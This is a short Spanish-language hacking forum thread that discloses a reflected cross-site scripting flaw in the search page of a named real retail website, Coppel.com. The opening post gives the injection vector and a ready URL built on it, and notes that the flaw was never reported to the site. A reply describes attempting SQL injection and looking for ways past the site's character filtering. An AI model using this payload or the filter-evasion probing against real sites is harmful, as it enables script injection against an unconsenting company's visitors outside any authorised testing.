[XSS] Coppel.com

Iniciado por el capi, Septiembre 20, 2013, 10:11:47 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Septiembre 20, 2013, 10:11:47 AM Ultima modificación: Enero 10, 2015, 01:20:18 PM por Expermicid

Path vulnerable: search
Vector: "><script>alert('XSS')</script>"
Reportado: No
Autor: El capi
URL= No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"><script>alert('XSS')</script>&page=5 

Muy buena! Trate de buscarle Sqli pero filtra muy bien los espacios y todos los caracteres que por lo menos yo uso para saltar el filtro este :/
Saludos,, Cronos.-